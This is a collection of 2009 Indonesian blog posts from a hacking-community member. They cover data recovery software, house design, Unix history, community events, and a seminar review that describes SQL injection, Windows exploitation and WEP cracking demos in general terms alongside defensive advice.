HACKING INSPIRATION

Mengembalikan Data Yang Hilang Dengan Get Data Back

noreply@blogger.com (adesurya-online.blogspot.com) — Wed, 28 Oct 2009 23:45:00 +0000

Keteledoran dalam penginstalasian system operasi dan pemformatan partisi hardisk secara asal-asalan merupakan salah satu penyebab kehilangan data di dalam harddisk anda. hal ini pulalah yang menimpa teman saya yang salah format harddisk sehingga mengharuskan saya untuk melakukan pengembalian data menggunakan software Get Data Back. Pada kasus ini, format file system yang digunakan oleh teman saya di partisi harddisknya adalah format file system NTFS. Untuk tidak memperpanjang basa-basi langsung saja kita untuk saling sharing informasi

Software Get Data Back yang saya gunakan disini adalah Software Get Data Back For NTFS V.303. Langkah Pertama Yang mungkin kita lakukan adalah penginstalasian software Get Data Back For NTFS V.303. setelah penginstalasian dilakukan, buka Software Get Data Back For NTFS V.303. Setelah Program dibuka maka akan tampil tampilan seperti dibawah ini

Setelah muncul tampilan seperti di atas, click button next untuk melanjutkan merecovery data. software akan otomatis mencari device-device penyimpanan data yang ada di komputer kita. Setelah Komputer berhasil mencari device-device penyimpanan data yang ada di komputer kita maka akan tampil tampilan seperti di bawah ini

setelah memilih drive tempat penyimpanan data kita yang hilang karena pemformatan atau segala macamnya, selanjutnya kita click button next, maka software akan melakukan proses pencarian data. waktu pencarian data ini biasanya akan memakan waktu sedikit lama, apalagi jika harddisk yang kita gunakan untuk menyimpan data mempunyai kapasitas penyimpanan yang besar. setelah software selesai melakukan searching pada data yang hilang. maka akan tampil tampilan seperti di bawah ini

Setelah keluar tampilan seperti di atas, click button next. Proses selanjutnya adalah proses recovery data. Get Data Back akan otomatis membuat daftar-daftar file yang bisa untuk di recovery. tugas anda disini adalah mencari file-file yang anda butuhkan. setelah anda menemukan file-file yang anda cari, click button copy yang ada di bawah top menu. setelah anda men-click button copy, maka folder yang anda inginkan tadi akan otomatis tersimpan di direktory C:\Program Files\Runtime Software\GetDataBack for NTFS

Dream House? Why Not??

noreply@blogger.com (adesurya-online.blogspot.com) — Sat, 08 Aug 2009 10:34:00 +0000

Rumah bisa dikatakan sebagai salah satu aspek penunjang di dalam kehidupan yang harus dipenuhi oleh setiap manusia. Ini dikarenakan sebagian besar aktifitas yang dilakukan oleh manusia baik itu aktifitas bekerja maupun aktifitas untuk istirahat dapat dilakukan di dalam rumah. Bukan itu saja, kepribadian seseorang dapat kita lihat dari kondisi rumah yang ditempati oleh orang itu, maksud kata-kata disini ialah bukan apakah rumah itu merupakan rumah mewah yang berkategori high class ataupun rumah dengan kategori rumah sangat sederhana dapat mencerminkan kepribadian otang yang menetapi rumah itu, maksudnya disini adalah kita dapat melihat kepribadian seseorang pemilik rumah dari aspek kebersihan dan aspek perawatan rumah.

Jika seseorang tidak dapat menata dan merawat rumahnya sedemikian rupa bukan tidak mungkin rumah itu bisa menjadi bencana bagi dirinya sendiri ataupun keluarganya. Banyak musibah-musibah yang ditimbulkan akibat perawatan rumah yang tidak maksimal, antara lain terpelesetnya penghuni rumah di kamar mandi yang diakibatkan kamar mandi yang licin dan tidak terawat ataupun jatuhnya si penghuni rumah dari tangga rumah yang sudah bisa dikatakan tidak layak pakai. Akan tetapi, rumah juga bisa menjadi tempat berdiam laksana surga yang indah dengan memperhatikan aspek-aspek desain rumah dan perawatan rumah.
Setiap orang yang tinggal di iklim tropis terutama di negara Indonesia yang dilalui oleh garis khatulistiwa pasti memimpikan rumah yang sejuk. Kebanyakan orang mengakali-nya untuk mendapatkan rumah yang sejuk dengan memasang air conditioner (AC). Bagi orang yang bisa dikategorikan berpenghasilan lebih memang tidak akan menjadi masalah besar bagi mereka untuk memasang AC, tapi bagaimana dengan orang yang berpenghasilan pas-pasan?. Ini dapat kita akali dengan pengaturan desain rumah. Antara lain langkah-langkah yang bisa kita lakukan dengan membuat ventilasi-ventilasi yang cukup. Selain itu, kita juga harus meminimalkan sinar matahari yang masuk secara langsung ke dalam rumah kita. Selain itu, usahakan sewaktu kita membeli atau membuat desain rumah, kita harus memperhatikan jarak antara plafon rumah dengan lantai. Jika plafon rumah kita mempunyai jarak dengan lantai yang cukup jauh dapat menyebabkan sirkulasi udara dapat berputar dengan lancar dan akan menyebabkan udara yang berada di dalam rumah sedikit terasa sejuk, selain itu aspek ini juga dapat mengurangi endapan-endapan panas yang berada di lantai. Aspek lain yang perlu diperhatikan dalam membuat semuah rumah yang adem tanpa AC adalah adanya tanaman-tanaman ataupun taman di dalam rumah yang berfungsi untuk mengubah karbondioksida menjadi oksigen yang biasa dihirup oleh manusia.
Negara Indonesia merupakan negara kepulauan yang berada di antara dua samudera. Hal ini mengakibatkan Indonesia masuk dalam zona daerah yang rawan akan gempa bumi, alangkah baiknya sebelum kita membeli/membuat suatu rumah kita juga harus memperhatikan kekuatan bangunan itu dikarenakan negara kita yang rawan akan gempa. Untuk membuat sebuah rumah yang tahan akan goncangan gempa bumi ada beberapa kriteria yang mesti kita penuhi antara lain struktur rumah yang kita beli/bangun harus kuat. Pondasi merupakan suatu inti/tiang dari sebuah rumah dapat dikategorikan apakah rumah itu tahan terhadap goncangan atau tidak. Untuk hal ini kita harus jeli atau mesti teliti memperhatikan aspek ini, lebih baik kita mengeluarkan uang yang sedikit lebih banyak untuk membangun pondasi yang kuat agar suatu rumah tahan terhadap goncangan gempa bumi agar rumah kita bisa tahan lama. Selain memperhatikan pondasi rumah, kita juga harus memperhatikan struktur tanah dimana rumah kita itu akan dibangun, saya sarankan untuk membangun rumah di tanah padat bukan tanah yang dahulunya dijadikan sawah ataupun rawa-rawa. Tanah padat akan sedikit lebih tahan goncangan jika dibandingkan dengan tanah rawa-rawa. Setelah memperhatikan aspek yang pertama yaitu aspek struktur rumah, aspek selanjutnya yang perlu kita perhatikan adalah aspek bahan bangunan atau material bangunan yang kita gunakan sebagai bahan baku rumah dan aspek furniture yang kita gunakan. Untuk aspek bahan baku material yang kita gunakan untuk membangun rumah hendaknya kita menggunakan bahan material yang terbuat dari kayu, gypsum ataupun material dinding yang ringan. Ini berfungsi untuk meminimalisir kekuatan goncangan rumah yang dihasilkan penggunaan material-material berbahan berat dalam membangun rumah, sehingga pondasi dapat menahan goncangan bangunan dengan lebih kuat. Untuk aspek furniture penulis sarankan agar menggunakan furniture yang menyatu dengan rumah. Ini dapat kita ambil contoh pada rumah-rumah yang ada di Jepang. Kebanyakan rumah-rumah yang berada di Jepang menggunakan furniture yang menyatu dengan rumah sehingga dapat meredam kekuatan goncangan sewaktu terjadi gempa bumi.
Bagi rekan-rekan yang ingin membeli rumah baik itu secara kredit kepada bank maupun secara cash kepada para penjual penulis mempunyai beberapa tips yang biasa digunakan berdasarkan pengalaman penulis bersama keluarga yang sudah beberapa kali melakukan transaksi jual beli rumah. Antara lain kita harus melakukan survey terhadap harga rumah yang ingin kita beli, jangan pernah kita mempercayai perkataan dari penjual yang mengatakan bahwa rumah ini merupakan rumah yang murah dengan tipe segini dan tipe segitu. Alangkah baiknya sebelum melakukan pembelian rumah, kita meminta fotocopy-an sertifikat rumah itu dan mengajukan penawaran rumah dengan menyerahkan fotocopy-an sertifikat rumah itu kepada bank yang kita percaya, sehingga kita dapat membandingkan harga rumah yang ditawar oleh bank dengan harga rumah yang di tawarkan oleh penjual. Apabila bank dapat menawar dengan lebih tinggi harga rumah itu dibandingkan penjual rumah menawarkan rumahnya, alangkah baiknya jika kita langsung membeli rumah itu karena jika suatu waktu kita kepepet tidak mempunyai uang kita tidak akan rugi jika menjualnya kepada bank. Selain itu banyak-banyak lah melihat atau melakukan survey-survey harga rumah ke developer-developer perumahan baru maupun melihat iklan yang tertera pada koran-koran. Setelah anda merasakan menemukan pilihan yang tepat pada sebuah rumah jangan buru-buru untuk melakukan transaksi dengan penjual itu, alangkah lebih baiknya jika anda lebih dahulu mencek kondisi bangunan dan mencek status kepemilikan rumah itu apakah rumah itu atas nama sendiri atau atas nama orang lain. Saya sarankan jika anda berniat membeli rumah lebih baik membeli rumah secara langsung kepada rumah dengan kata lain tidak melalui calo. Biasanya untuk daerah metropolitan, calo meminta fee 20 % setiap kali transaksi. Bisa anda bayangkan berapa harga yang dimintanya bukan?. Bayangkan saja saya analogikan jika yang punya rumah meletakkan harga rumah kepada calo 200 juta bisa saja calo menawarkan kepada anda 240 juta-an. Atau bahkan ada calon yang berani meminta fee lebih dari 20 %.
Setelah saya memaparkan beberapa pengalaman saya dalam membeli dan membuat desain rumah mudah-mudahan dapat membantu rekan-rekan dalam merancang rumah idaman nya masing-masing. Sekarang tergantung inovasi dan imajinasi dari rekan-rekan untuk mengembangkannya dan menciptakan sebuah rumah idaman. Dan rumah idaman itu tidak selalu identik dengan rumah mewah yang memiliki nilai jual milyaran rupiah. Dengan uang ratusan rupiah saja kita dapat membuat rumah yang mempunyai nilai seperti nilai milyaran rupiah jika kita bisa melakukan sedikit inovasi-inovasi yang baru.

Tutorial Belajar Linux (Only Pemula

noreply@blogger.com (adesurya-online.blogspot.com) — Tue, 28 Jul 2009 08:21:00 +0000

Bagi temen-temen Yang ingin mempeajari linux lebih dalam mulai dari sejarah linux, file system linux, hak akses linux, instalasi linux, command dasar linux dan segalnya silahkan langsung download aja disini deh, ngak usah banyak-banyak yang ane omongin,, silahkan download y temen-temen.. Download All Tutorial Linux

Himbauan Untuk Rekan-Rekan Networking

noreply@blogger.com (adesurya-online.blogspot.com) — Tue, 21 Jul 2009 08:52:00 +0000

Assalamaualaikum Wr. WB.
Untuk Menghindari hal-hal yang tidak kita ingin kan dan untuk dapat menjaga kestabilan dan keamanan negara indonesia baik itu di dunia maya atau dunia nyata (sedikit lebay y kata-katanya) maka kami himbau kepada rekan-rekan hacker, cracket dan seluruh praktisi networking untuk tidak melakukan serangan-serangan yang dapat membahayakan sistem ataupun pusat data tabulasi suara situs Pusat Penghitungan Suara KPU. Atas perhatian rekan-rekan semuanya kami ucapkan terima kasih. mari kita ikut menjaga kehormatan bangsa kita dengan menyukseskan perhelatan akbar ini karena perhelatan ini merupakan perhelatan kita juga bukan perhelatan beberapa orang saja.
Terima Kasih Atas Partisipasi rekan-rekan semuanya
Wassalam

Jaket Community Yogyafree Regional Bandung

noreply@blogger.com (adesurya-online.blogspot.com) — Mon, 25 May 2009 12:44:00 +0000

Bagi temen-temen yang ingin gabung untuk buat jaket yf regional bandung silahkan posting disini... yang dimana gambarnya dapat dilihat di bawah ini.

penjelasan depan :
1. tulisan di bagian kiri adalah x-code
2. Warnanya masih belum fix,, tergantung dari teman-teman yang banyak minatnya silahkan reply postingan ini.
3. untuk kerah bajunya rencananya akan di desain resletting yang dimana setelah resletting akan dilampisi kain yang berwarna
sesuai dengan warna blitz jaket (jadi resletting tidak kelihatan)

penjelasan belakang :
1. gambar belakang adalah logo x-code. bagi temen-temen yang belum punya silahkan download atau bagi yang sudah punya cd raider III silahkan cek di cd nya.
2. Tulisan dibawah logo adalah (sesuai urutan) : 1. Networking
2. Scripting
3. Hacking
4. Coding
Bagi temen-temen yang ingin menambahkan tulisan di belakang jaket atau ngasih masukan silahkan reply posting ini
3. Tulisan yang paling bawah bertuliskan
X-Code
Bandung

NOTE :
(Pemesanan terakhir tanggal 30 Mei 2009 dikarenakan yf reg bandung berencana akan mengadakan seminar di bulan agustus dan desember dan diharapkan seluruh crew reg. bandung sudah mempunyai jaket)
Bagi temen-temen yang ingin memesan jaket ataupun ngasih masukan bisa contact aq langsung di ym adesurya_tkj atau di nick nya kang ^xfree^
Terima Kasih perhatiannya

Additional Info For Crew YF Reg. Bandung

Setelah usainya acara IT days yang berlangsung di awal bulan ini yang bertempat di yogya, kami dari yogyafree reg. bandung berencana akan mengadakan seminar yang bisa dikategorikan seminar nasional yang akan
berlangsung pada bulan Agustus dan Desember. pada bulan agustus kami berencana akan mengadakan di salah satu kampus swasta di daerah bandung yang mendatangkan nara sumber dari pengurus yogyafree maupun administratornya (Masih Dalam Perencanaa)
dan untuk Bulan Desembernya kami berencana akan mengadakan seminar ID SECONF 2009 untuk dilaksanakan di bandung (Masih Dalam Perencanaan).
Untuk itu kami mengharapkan dukungan dari teman-teman crew yogyafree reg. bandung untuk ikut berpartisipasi dan untuk lebih aktif dalam organisasi yogyafree reg. bandung agar acara reg. bandung ini dapat berjalan sesuai dengan jadwalnya
terima kasih
-----------------------------------------------------------------------------------------------------------------------

Gathering YF

noreply@blogger.com (adesurya-online.blogspot.com) — Mon, 06 Apr 2009 02:18:00 +0000

Huh,,,, Akhirnya Gathering Bandung YF dilaksanakan kembali... Pertemuan kali ini hanya dihadiri oleh beberapa anggota YogyaFree Reg. Bandung saja.. pada pertemuan kali ini kami membahas masalah IT Days ke Yogya dan rencana untuk mengadakan acara ID-Seconf 2009 yang rencananya akan dilaksanakan di kota Bandung (masih dalam perencanaan). diharapkan teman-teman dari komunitas-komunitas IT lainnya untuk dapat ikut mensupport kami sehingga acara-acara yang kita nantikan bersama-sama itu dapat terwujud dan terlaksana di Kota Bandung.
Selain itu sedikit bocoran, untuk acara IT Days ke Yogya, kami dianjurkan untuk mempersentasikan sebuah materi baik itu materi yang bertema tentang security, network maupun komputer umum. Dan bagi rekan-rekan komunitas Bandung YogyaFree yang mempunyai saran atau masukan untuk materi yang akan dibahas/disampaikan silahkan tinggalkan komentarnya disini. oh ya, sebelum itu kami ucapkan selamat kepada rekan-rekan komunitas secure-hacklink yang sudah terbentuk mudah-mudahan antar komunitas kita dapat saling bekerjasama untuk kemajuan IT Indonesia dan Bandung khususnya.
Bagi rekan-rekan IT yang ingin bergabung dengan Komunitas Yogyafree Reg. Bandung silahkan kirimkan biodata rekan-rekan semuanya yang berminat (Di Dalam Biodata Harus Terdapat Nama Asli, Username, Alamat E-Mail, Alamat Blog Dan Nomor Telepone, Kontak YM) ke alamat e-mail adesurya_tkj@yahoo.co.id. Karena kami berencana untuk merekap ulang anggota komunitas YogyaFree Reg. Bandung. Dan tidak lupa kami meminta doa restu dari rekan-rekan YogyaFree Reg. Bandung dikarenakan beberapa anggota YogyaFree Reg. Bandung akan berangkat ke Yogya unutk mengikuti acara IT Days yang berlangsung dari tanggal 2 sampai 5 Maret, dan kami sendiri rencananya akan berangkat pada tanggal 1 Mei.
Pengumuman lainnya mungkin dalam beberapa waktu berikutnya blog ini tidak dapat diakses untuk beberapa waktu kira-kira 2 hingga 3 minggu karena kami berencana untuk mendesain ulang blog ini supaya lebih bersifat interaktif sehingga rekan-rekan semuanya tidak bosan untuk mengunjungi blog ini dan diharapkan partisipasinya dari rekan-rekan IT untuk meramaikan blog ini.

REVIEW SEMINAR SECURITY SYSTEM & LIVE DEMO HACKING 2009

noreply@blogger.com (adesurya-online.blogspot.com) — Mon, 06 Apr 2009 02:14:00 +0000

Akhirnya, acara-acara yang dinantikan para pengamat IT dan para komunitas hacking underground dimulai juga. Acara yang bertajuk Seminar Security System & Live Demo Hacking 2009 dimulai, walaupun acara ini sempat molor hingga se jam. Acara yang rencananya dimulai pada pukul 09.00 WIB diundur hingga pukul 10.00 WIB. Seminar ini sendiri menampilkan narasumber dari berbagai kalangan underground nasional antara lain dari yogyafree ada family_code, ^rumput_kering^, za_2007. Sedangkan dari coder diwakili oleh kang harry beserta team coder.web.id. Selain Seminar Security System & Live Demo Hacking 2009, pada acara kali ini juga ada pertemuan antara komunitas hacking di Indonesia. Antara lain dari komunitas coder diwakili oleh staff administrator-nya akang harry, dari yogyafree reg. bandung diwakili adesurya_tkj. Selain itu juga ada rekan-rekan dari ilmu website, secure-hacklink dan comic community.

Acara dimulai dengan kata sambutan dari kang ^rumput_kering^ selaku ketua panitia dan dilanjutkan dengan kata sambutan oleh rektorat STMIK AMIK Bandung. Materi pertama disampaikan oleh kang hary (Staff Administrator) dari coder.web.id. kang harry menjelaskan tentang web hacking yang dimana kang harry menggunakan teknik sql injection dan record id. Terbukti walaupun teknik ini sudah tergolong “jadul” (sesuai dengan yang dikatakan oleh xnuxer) tetapi masih terbukti ampuh untuk melumpuhkan beberapa site di Indonesia. Bahkan site-site yang terinjeksi oleh SQL ini boleh dibilang situs-situs vital di Indonesia, antara lain ada site Ikatan Dokter Indonesia disalah satu daerah di Indonesia dan beberapa Situs Perguruan Tinggi terkenal di Indonesia (Maap sebelumnya kami tidak bisa menyebutkan daerah mana yang terinjeksi karena melanggar kode etik kami). Hal ini merupakan peringatan besar bagi admin-admin lainnya jika website yang mereka tidak ingin menjadi ajang olok-olok kan bagi para cracker-cracker yang ada. Bukan hanya di Indonesia, beberapa Site di negara Afrika juga masih bisa terinjeksi dengan teknik SQL ini.

Setelah kang harry selesai melakukan demo web hackingnya, acara dilanjutkan oleh ^rumput_kering^ dan za_2007 dengan menyajikan materi local hacking. Dengan memanfaatkan bug yang tersedia pada varian windows XP SP 1,SP 2,SP 3 hingga Windows 2003 server sampai windows 2008 Server, kita bisa mengambil alih computer lawan tanpa harus menginstal spyware maupun remote client. Sungguh teknik yang sangat berbahaya jika sampai dimanfaatkan oleh cracker, ini dikarenakan komputer kita dapat dengan mudah dikuasai oleh cracker tanpa kita ketahui karena sang cracker dapat menyerang dengan melakukan scanning IP saja. Teknik ini kira-kira menghabiskan waktu 15 menit untuk menguasai komputer target. Setelah kita menguasai computer target kita dapat meng-copy data target, melihat save password computer target bahkan untuk men-delete data computer target sendiri dapat kita lakukan dengan menggunakan teknik ini. teknik ini menggunakan teknik metasploit yang dapat kita download software metasploit di website resmi metasploit. Teknik ini dapat dicegah dengan mengaktifkan firewall dan menutup port-port yang memberi akses untuk cracker mengambil alih computer kita. Selain itu juga dengan cara melakukan update windows dan menggunakan antivirus yang selalu di update.

Setelah ^rumput_kering^, za_2007 menyelesaikan materi ini, acara dilanjutkan oleh founder yogyafree yaitu family_code, family_code membawakan materi wireless hacking WEP/WPA dengan menggunakan backtrack 3. Dengan memanfaatkan teknik ini kita dapat mengetahui password WEP suatu AP dan mengetahui IP hidden. Sungguh teknik yang sangat-sangat berbahaya karena teknik ini bisa membahayakan suatu jaringan dan menjadi peringatan besar bagi admin-admin yang mengurus jaringan disuatu daerah bebas hotspot. Dengan teknik ini sang cracker bisa merusak struktur jaringan wireless itu sendiri dan mengambil alih jaringan itu. Selain bisa masuk dan menguasai jaringan itu, sang cracker juga bisa menguasai computer target dan mengambil data-data berharga dari computer target. Teknik ini bisa diatasi dengan menggunakan WPA atau dengan menggunakan random password yang dimana system dapat mengacak password jaringan sekali dalam 5 menit sehingga cracker bisa dibuat kepusingan melakukan kegiatan crackingnya.

Setelah family_code selesai melakukan demo hacking, kegiatan diakhiri dengan diskusi antar komunitasi hacking. Disini kita bersepakat untuk lebih meningkatkan tali silaturahmi antar komunitas hacking. Komunitas hacking yang hadir dalam kegiatan itu antara lain coder.web.id, yogyafree bandung, comic, IlmuWebsite, Secure Hacklink. Selain untuk lebih meningkatkan silaturahmi, kami juga berencana untuk mengeluarkan majalah hacking bersama. Mudah-mudahan dengan pertemuan ini komunitas-komunitas hacking di Indonesia dapat bersatu dan saling support karena setelah mendengar visi dan misi dari masing-masing komunitas ternyata kami semua memiliki visi yang sama untuk menjadikan bangsa Indonesia menjadi lebih baik dan menjadi Negara yang disegani oleh dunia di bidang IT bukan menjadi Negara yang di black list oleh dunia karena kegiatan pembajakan dan cracking nya. Amin.

Pengumuman Penting

noreply@blogger.com (adesurya-online.blogspot.com) — Mon, 30 Mar 2009 03:37:00 +0000

Waduh ada tugas VoIP ne,,,, hehehehe,, Lagi Banyak Kerjaan Neh Diriku,, ada sukarelawan ngak yang maw nolongin.. hahahahha.. oh ya temen-temen yang maw ikut IT Days contact me ya di ym:adesurya_tkj... coz peserta nya sangat terbatas.. Untuk Komunitas YogyaFree Bandung dan YogyaFree Pusat silahkan langsung mengkontak moderator-moderator masing-masing Regional. Khusus untuk YF Bandung bisa Langsung Contact ME.. OK.. Cayo Hacking Indonesia

SEJARAH SINGKAT TENTANG UNIX

noreply@blogger.com (adesurya-online.blogspot.com) — Thu, 19 Mar 2009 08:17:00 +0000

Unix adalah nama sebauh system operasi yang asal mulanya dikembangkangkan
pada laboratorium Bell, AT dan T. Untuk lebih mendalami apakah UNIX, perlu diketahui
untuk system operasi terlebih dahulu. Apakah system operasi ? Sistem operasi adalah
sebuah perangkat lunak computer yang mengatur dan mengembalikan operasi dasar
system computer. UNIX terdiri atas sejumlah program (dapat instruksi untuk
memperoleh hasil tertentu0. Yang dirancang untuk mengontrol interaksi antara fungsi –
fungsi tugas dari system operasi, diantaranya :
1. Melakukan fungsi manajemen system berkas
2. Mengendalikan berbagai sumber pada system, seperti disk dan printer.
3. Mengantar sejumlah pemakai yang menggunakan system bersamaan
4. Membentuk penjadwalan proses didalam system.
A. PORTABILITAS
Sistem UNIX mudah diadaptasikan ke system computer yang lain. Sifat portabilitas ini
membawa UNIX dapat mudah dipakai, pada berbagai jenis computer. Kini Linux telah
menyebar pada berbagai jenis system. Dari Notebook, Personal Computer (PC), hingga
Mainframe perusahaan. Komputer besar seperti IBM Sun Micro System juga
mengeluarkan computer yang berbasis UNIX.
Bagi pemakai, hal seperti ini sangatlah menguntungkan. Mengapa demikian ? sebab
portabilitas berarti ketidak bergantungan pada suatu perangkat keras. Ini berarti pemakai
tidak perlu terpaku pada satu vendor saja. Untuk beralih dari suatu system UNIX ke
MULTI USER
UNIX
SISTEM BERKAS
HIERARKIES
MULTI TASKING
PORTABILITAS
DUKUNGAN
UTILITAS
LAIN - LAIN
system UNIX lainnya. Dapat dilakukan dengan mudah, hal ini tidak hanya terbatas pada
sistemnya saja, melainkan juga pada aplikasinya.
Program aplikasi yang berjalan pada suatu system UNIX. Dapat dipindahkan ke system
UNIX lainnya, dengan jalan mentransfer program dan kemudian melakukan kompilasi
lagi pada system UNIX yang baru. Bahkan beberapa aplikasi bersifat kompatibel dalam
bentuk obyek, sehingga tidak diperlukan proses kompilasi.
B. MULTI USER
Multiuser berarti sejumlah orang (pemakai) dapat menggunakan system secara
bersamaan dan berbagai sumber. UNIX mendukung keperluan seperti ini, yaitu
keuntungan dengan adanya sifat MULTI USER :
a. Penhematan perangkat keras, sebab perangkat keras dapat dipakai oleh orang
banyak.
b. Data dapat diakses oleh orang banyak secara serentak.
Ini berarti tidak ada penduplikasi data. Selain itu konsistensi data lebih terjamin.
C. MULTI TASKING
Seorang pemakai dapat melakukan beberapa pekerjaan dalam waktu yang bersamaan dari
sebuah terminal. Pekerjaan – pekerjaan yang tidak memerlukan interaksi dari pemakai.
Bisa dilaksanakan dilator belakang. Pemrosesan ini memungkinkan saat suatu pekerjaan
sedang dilaksanakan oleh system, pemakai dapat melakukan tugas-tugas yang lain.
D. SHELL UNIX
Shell UNIX menjadi jembatan antara pemakai dan system. Ia bertindak sebagai
penerjemah perintah yang sangat bermanfaat bagi pemakai kemampuan, Shell mencakup
dua hal, yaitu :
 Modus Interaktif dan
 Modus Pemrograman
Pada mode interaktif, pemakai dapat memberikan perintah dan kemudian shell akan
mengerjhakan perintah yang diberikan. Hal ini dapat diulang-ulang sebab begitu shell
telah selesai menjalankan perintah, shell akan menunnggu pemakai memberikan perintah
kembali.
Pada modus pemrograman, pemakai dapat menyusun suatu program yang sejumlah
perintah yang biasa disebut skrip shell. Selanjutnya, shell akan mengerjakan perintah –
perintah tersebut secara berurutan. Hal seperti ini sangat bermanfaaat untuk menangani
pekerjaan yang bersifat rutin. Pada modus ini pemakaian dapat membuat suatu prototype.
Suatu kegiatan tanpa harus menggunakan bahasa pemrograman seperti C. Baik pada
mode interaktif maupun pemrograman. Pemakai dapat dengan mudah mengarahkan
keluar –keluaran perintah yang normalnya kelayar menjadi ke suatu berkas. Bahkan
pemakai dapat jhuga mengatur agar hasil suatu perintah menjadi masukan bagi perintah
yang lain.
E. UTILITAS
Sistem Operasi UNIX atas sejumlah program yang antara lain berupa utilitas-utilitas yang
tersedia pada UNIX mempunyai tugas yang bermacam-macam, antara lain berhubungan
dengan :
Manajemen berkas
Penyunting berkas
Pendukung Komunikasi
Pendukung pengembangan perangkat lunak
Dengan mengkombinasikan utilitas. Untuk yang ada, pemakai dapat membuat program
baru untuk melaksanakn tugas seperti yang diharapkan hal ini dapat dilakukan dengan
cepat dan mudah.
F. Masyarakat UNIX
Kalau semua pemakaian UNIX terbatas pada keinginan tertentu terutama lingkungan
Universitas, kjini UNIX juga banyak dipakai untuk menangani aplikasi bisnis. UNIX
juga seringkali banyak digunakan untuk memecahkan persoalan yang kompleks pada
permasalahan statistic dan engineering.
Saat ini banyak perkumpulan pemakai dan engineering. UNIX yang bertebaran diinternet.
I Indonesia, para pengguna Linux mempunyai kelompok tersendrir, selain itu juga
muncul majalah yaitu infolinux, perkembangan UNIX juga tidak lepas dengan lembaga –
lembaga atau organisasi yang melakukan standarisasi, antara lain :
ANSI (American National Standards Institute)
Mempunyai peranan dalam dunia UNIX. Institusi ini meyediakan standar
pemrograman C yang dibentuk melalui komite ANSI XJ311
X/OPEN
X/OPEN merupakan konsorsium International Non Provit dari sejumlah pabrik
computer, seperti Bull, ICL, Olivetti, Nixdorf, Philips dan Siemens. Didirikan
pada tahun 1984, selain perusahaan computer Eropa, pabrik computer Amerika
seperti DEC,HP dan Unlsys serta AT DAN T jhuga menjadi anggotanya, tujuan
dari kelompok yang sangat berpengaruh dibenua Eropa ini adalah mendefinisikan
lingkungan untuk mendukung portabilitas perangkat lunak
Spesifikasi system terbuka yang dikeluarkan oleh organisasi ini adalah XPG (X/OPEN
Portability Guide).
ISO (International Standards Organization)
Ikut mengembangkan beberapa standard, terutama dalam lingkup komunikasi
computer.
X-Consorfium
Konsorsium ini membuat pedoman antarmuka yang berdasarkan teknologi XWINDOWS.
AT & T
AT & T mengeluarkan standar system V yang disebut SUID. Standar ini
menyebutkan fasilitas-fasilitas pada UNIX yang dijamin tidak bakal berubah pada
rilis –rilis mendatang.l

Indonesia, “Negeri Super Power”

noreply@blogger.com (adesurya-online.blogspot.com) — Mon, 09 Feb 2009 05:10:00 +0000

Oleh: Ade Surya Iskandar *(

(http://www.adesurya-online.blogspot.com)

Indonesia merupakan salah satu negeri yang dianugerahi oleh tuhan penuh dengan kekayaan alam yang melimpah. Baik itu kekayaan sumber daya alam-nya maupun kekayaan sumber daya manusia-nya. Apapun yang kita butuhkan sudah tersedia dengan lengkap di negeri ini, mulai dari emas, perak, tembaga, minyak bumi, gas alam dan sebagainya. Salah satu “mukjizat” yang dimiliki Indonesia yang tidak dimiliki oleh negeri lain bahkan negeri super power seperti Amerika sendiri tidak memilikinya. Bahkan batang kayu saja jika ditanam di tanah Indonesia bisa tumbuh menjadi pohon yang subur. Belum lagi jika kita tinjau dari segi populasi penduduk dan luas wilayah Indonesia. Bayangkan saja, dengan jumlah penduduk pada tahun 2006 sebanyak 222 juta jiwa dengan jumlah pulau 17.508 menjadikan Indonesia sebagai negara kepulauan terbesar di dunia. Sekarang yang jadi pertanyaan mengapa di negeri sekaya dan negeri se-megah Indonesia masih ada warga nya yang kelaparan, kekurangan gizi dan sejenisnya? Apakah ini akibat tidak profesionalnya kita mengolah hasil alam yang sudah diberikan oleh tuhan kepada kita atau kah ini akibat kebodohan kita sendiri yang tidak bisa mengolahnya dan akhirnya bangsa lain yang menikmatinya? Atau bisa jadi ini akibat dari kebobrokannya mental para pejabat indonesia yang maruk akan kekayaan alam kita? Mungkin ini salah satu kesalahan kita yang dengan mudah saja dipengaruhi oleh bangsa asing sehingga hasil bumi kita yang melimpah tidak bisa dinikmati oleh putra-putri bangsa Indonesia sendiri. Ini merupakan pertanyaan sederhana tapi mempunyai makna yang sangat berarti bagi kelangsungan kehidupan rakyat Indonesia maupun Negara Kesatuan Republik Iindonesia

Sungguh pertanyaan miris yang menyesakkan dada kita. Di sisi lain para putra-putri Indonesia terus berhasil mengukir prestasi yang membanggakan, juara dunia di bidang sains, juara olimpiade matematika dan olimpiade fisika, bahkan di bidang teknologi, para hacker-hacker dari Indonesia sangat disegani oleh hacker-hacker dunia. Kemanakah para putra-putri Indonesia yang cerdas itu? Mereka banyak yang bekerja di luar negeri seperti Singapura, Malaysia, Jepang bahkan Amerika sekalipun mengambil putra-putri Indonesia sebagai tenaga ahlinya. Itu berarti Indonesia tidak mengalami masalah dalam sumber daya manusianya. Kita hanya kurang peduli menjaga aset-aset berharga bangsa ini sehingga putra-putri kita ditarik oleh bangsa asing. Kurangnya penghargaan dan pengakuan dari pemerintah menyebabkan putra-putri Indonesia lebih memilih untuk tinggal di luar negeri. Bayangkan saja disaat para musisi begitu tinggi diberi penghargaan oleh masyarakat Indonesia, sedangkan para atlet, pakar pendidikan dan pakar teknologi tidak begitu diperhatikan. Oleh karena itu banyak putra-putri kita yang berprestasi di bidang olahraga dan pendidikan lebih memilih bekerja di luar negeri.

Untuk kedepannya mari kita berbenah, untuk membenahi negeri kita yang sedang mati suri ini. Pembenahan ini harus secara total dilakukan, tidak bisa hanya mengandalkan pemerintah saja. Karena setiap orang yang berada di negara ini wajib untuk membela dan membangun negaranya. mulai dari tingkat bawah seperti RT/RW, Kepala Camat, Kepala Lurah, Bupati, Walikota, DPR, MPR hingga Presiden. Memang melakukan perubahan ini memakan waktu yang cukup lama. Tapi tidak ada istilah terlambat untuk berubah menjadi yang baik, karena Indonesia tidak hanya sepuluh tahun mendatang ataupun 20 tahun mendatang. Indonesia tetaplah Indonesia yang tetap jaya hingga dunia ini berakhir. Oleh karena itu marilah diri kita masing-masing berbenah diri menjadi yang terbaik bagi negeri ini. Karena kalau bukan kita siapa lagi yang mau membenahi negeri tercinta ini.

